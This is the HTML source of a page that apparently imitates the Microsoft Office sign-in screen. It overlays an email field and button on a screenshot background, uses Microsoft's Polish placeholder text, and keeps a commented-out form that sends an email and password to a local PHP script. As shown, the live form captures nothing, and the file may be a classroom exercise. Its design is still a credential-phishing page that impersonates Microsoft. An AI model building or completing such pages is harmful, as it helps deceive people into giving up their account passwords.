<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Microsoft Office</title>
    <link rel="icon" type="image/x-icon" href="office.png">
    <style>
        body {
            background-image: url('1.png');

        }

        #mail {
            background-color: white;
            border: none;
            width: 15vw;
            margin-top: 37.5vh;
            margin-left: 38vw;
            font-size: 15px;
            }

        #dalej {
            background-color: transparent;
            margin-top: 13.5vh;
            margin-left: 53.5vw;
            width: 6.5vw;
            height: 4vh;
            border: none;
            cursor: pointer;
        }


    </style>
</head>
<body>
    <!-- <h1>Witamy na stronie microsoft.com</h1> -->
    <!-- <form action="http://localhost/5D/2.php" method="get">
        Podaj email: <input type="text" name="mail"><br>
        Podaj hasło: <input type="text" name="haslo"><br>
        <input type="submit">
        </form> -->
<p>
    <form action="6.html">
        <input type="text" id="mail" placeholder="Adres e-mail, telefon lub Skype"><br>
        <!-- <input type="password" name="haslo"><br> -->
        <input type="submit" value="" id="dalej">
    </form>


</body>
</html>